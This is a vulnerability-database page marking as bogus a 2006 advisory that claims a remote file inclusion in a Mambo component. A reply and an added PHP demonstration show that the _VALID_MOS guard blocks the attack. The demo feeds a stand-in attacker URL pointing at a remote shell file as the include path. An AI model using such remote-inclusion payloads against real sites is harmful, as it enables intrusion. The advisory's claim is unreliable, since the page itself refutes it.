WARNING! Fake news / Disputed / BOGUS

Mambo Component - Display MOSBot Manager Remote File Inclusion Vuln

2006.08.28
Credit: O.U.T.L.A.W
Risk: High
Local: No
Remote: Yes
CWE: CWE-Other


CVSS Base Score: 7.5/10
Impact Subscore: 6.4/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: Not required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

On Sun, 2006-08-20 at 01:55 +0000, Outlaw (at) aria-security (dot) net [email concealed] wrote:

> ###########################################################################################
> # Aria-Security.net Advisory #
> # Discovered by: O.U.T.L.A.W #
> # < www.Aria-security.net > #
> # Gr33t to: A.U.R.A & Hessam-X & Cl0wn & DrtRp #
> # #
> ###########################################################################################
>
> #Software: Mambo Components ContXTD
> #Attack method: Remote File Inclusion
> #Source:
>
> ** ensure this file is being included by a parent file */
> defined( '_VALID_MOS' ) or die( 'Direct Access to this location is not allowed.' );
>
> include_once( $mosConfig_absolute_path .'/includes/vcard.class.php' );

The "defined( '_VALID_MOS' ) or die" you quoted is there to prevent this. You can't define that constant from POST or GET.
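The following is an added example, not code from the advisory, the reply, or Mambo itself. It reproduces the two quoted lines as a small PHP function and emulates the register_globals behaviour of the era with extract() (an assumption made for the demonstration; the function name child_file, the attacker URL and the local path are also assumptions), so that the reply's point can be seen to hold: a request parameter can populate $mosConfig_absolute_path, but it can never define the _VALID_MOS constant, so the include_once is unreachable on a direct request.

```php
<?php
// Added example (not from the advisory or Mambo): why the quoted guard
// prevents the claimed remote file inclusion.

// Hypothetical child file, modelled on the two lines quoted in the advisory.
// The guard is written as a check that returns instead of die() so the
// two request scenarios below can run in one script.
function child_file(array $request): string
{
    // Emulate register_globals: every request parameter becomes a local
    // variable (assumption; Mambo-era hosts commonly ran with it enabled).
    // extract() creates variables, never constants, so it cannot satisfy
    // the defined('_VALID_MOS') test below.
    extract($request);

    // The guard quoted in the advisory.
    if (!defined('_VALID_MOS')) {
        return 'Direct Access to this location is not allowed.';
    }

    // Only reachable when a parent PHP file has already run
    // define('_VALID_MOS', 1); on a direct request we never get here,
    // so the attacker-controlled path is never passed to include_once.
    return 'would include: ' . $mosConfig_absolute_path . '/includes/vcard.class.php';
}

// Scenario 1: direct request with an attacker-supplied path (constructed input).
$direct = ['mosConfig_absolute_path' => 'http://attacker.example/shell.txt?'];
echo child_file($direct), PHP_EOL;

// Scenario 2: the legitimate flow. The parent (Mambo's index.php) defines the
// constant and sets the path from its own configuration before including
// the child; the request cannot undo an already-defined constant.
define('_VALID_MOS', 1);
$legit = ['mosConfig_absolute_path' => '/var/www/mambo'];
echo child_file($legit), PHP_EOL;
```

Run with `php child_file.php`: the first call returns the "Direct Access" message without touching $mosConfig_absolute_path, the second reaches the include path built from the parent's configuration. The guard only protects files that carry it; every PHP file in a component that is reachable by URL needs the same first line, or the register_globals pattern above becomes a genuine remote file inclusion.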


Copyright 2024, cxsecurity.com